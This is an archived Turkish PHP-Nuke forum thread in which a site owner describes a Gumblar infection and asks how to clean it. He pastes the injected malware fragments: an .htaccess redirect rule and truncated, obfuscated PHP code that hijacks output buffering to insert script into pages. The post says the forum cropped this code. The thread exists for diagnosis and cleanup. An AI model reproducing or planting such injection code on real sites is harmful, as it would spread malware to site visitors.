BU SİTE PHP-NUKE SONLANINCA KAPANDI. İÇİNDE EMEK OLDUĞUNDAN AÇIK TUTULMAKTADIR.
GÜNCEL İÇERİK BLOG SAYFASINDADIR!
Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 960
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(5604 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(9155 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3945 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(11229 okuma, 10 yanıt)
 Nuke Sentinel..
(5094 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5646 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(4057 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(11739 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(10770 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(6023 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(46315 okuma, 45 yanıt)
 Bu bir saldırmı..
(9502 okuma, 7 yanıt)
 siteme virüs girmis..
(9576 okuma, 6 yanıt)
 Sitedekileri atmak..
(6067 okuma, 2 yanıt)
 Kötü botları engellemek...
(12905 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(8259 okuma, 5 yanıt)
 index atılamayan site yap..
(8194 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(6198 okuma, 2 yanıt)
 js trojandownloader.agent..
(6602 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(8758 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5787 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6925 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(16276 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(30090 okuma, 25 yanıt)
 hacklendim mi?..
(6933 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(87116 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(5159 okuma, 1 yanıt)
 Site neden Google i banla..
(4806 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(7277 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(8441 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(8487 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(11499 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(8079 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5749 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(5428 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(6161 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(5656 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3947 okuma, 0 yanıt)
 Protector' deki Host İs..
(3966 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(8694 okuma, 7 yanıt)
 index dosyasının chmod k..
(4712 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(4175 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(9102 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(5180 okuma, 1 yanıt)
 Nuke Güvenlik..
(181558 okuma, 257 yanıt)
 bütün index lere iframe e..
(22093 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(6610 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(28213 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(21998 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(4405 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Sİtenize virüs bulaşabilir!..
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Sİtenize virüs bulaşabilir!..

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 02:11:26    Mesaj konusu: Sİtenize virüs bulaşabilir!.. Alıntıyla Cevap Gönder

Siteme Gumblar adında bir virüs bulaştı. Tüm dosyaların içine bir kod atıyor ve siteyi müthiş yavaşlatıyor. Giren herkesin bilgisayarına da trojan atıyor. Nod32 bulmuyor bile, sadece kaspersky bulup siliyor bilgisayardan. Siteden ise tüm dosyaları tek tek temizleyerek kurtulabiliyorsunuz.

Eğer doğru teşhis edebilmişsem (ki ustalar daha iyi bilir) .htaccess içine şu kodları atıyor;
Kod:
RewriteEngine on
Options All
RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^index\.htm$ "http\:\/\/readme\.txt" [R=302


html dosyalarına da;
Kod:
<s><function></s>

bunu atıyor.

php dosyalarına ise;

Kod:
</s>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<s><n></s>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count>


Tecrübemi paylaşmak istedim. Vede tek tek dosya temizlemeden toplu halde bu illetden kurtulmanın yolunu bilen varsa YARDIM bekliyorum. Çoook sevinirim.

KODLARI NETOPSİYON KIRPIYOR; KISACA
html içine jawascript atıyor.
php ye de karmakarışık bir kodla birlikte gene jawa atıyor.

Birde sanırım artık phpnuke den caymaya başladım. Phpfusion a mı geçsek.

..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2025-09-04, 21:32:21    Mesaj konusu: Forum Arası Reklamlar


Başa dön
artistbaron
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Dec 09, 2006
Mesajlar: 2993

MesajTarih: 2009-06-01, 04:03:39    Mesaj konusu: Alıntıyla Cevap Gönder

İframe virüs için birde buraya bakabilirsiniz.

http://www.saho.in/sitenize-i f r a m e-virusu-bulasirsa-temizlemeniz-icin-script/

İşe yarayabilir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 11:21:58    Mesaj konusu: Alıntıyla Cevap Gönder

artistbaron sağolasın. Denedim şimdi o linki. Ama hata veriyor; line 7 diyor.

Aslında script nasıl kullanılır onu bilmiyorum. Bu kodları tmz.php olarak kaydettim ana dizine attım ve çalıştırmayı denedim. Ama olmadı.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Virüs ahmetx Php Nuke Sorunlarınız 1 2010-07-21, 11:52:37 Son Mesajı Görüntüle
Yeni mesaj yok siteme virüs girmis atakanxx Php Nuke Güvenlik 6 2010-02-16, 07:20:28 Son Mesajı Görüntüle
Yeni mesaj yok Yine virüs Girer mi ? denizcifcii Php Nuke Sorunlarınız 9 2009-09-16, 02:30:46 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle
Yeni mesaj yok Bu Nedir Arkadaşlar Fikri Olan Var mı... KaRNeC_81 Php Nuke Sorunlarınız 2 2009-08-21, 15:20:47 Son Mesajı Görüntüle

Copyright © 2002-2025 Ali Osman KAHRAMAN - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
netopsiyon®, Ali Osman KAHRAMAN' a ait tescilli bir markadır. İzinsiz kullanılamaz!
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright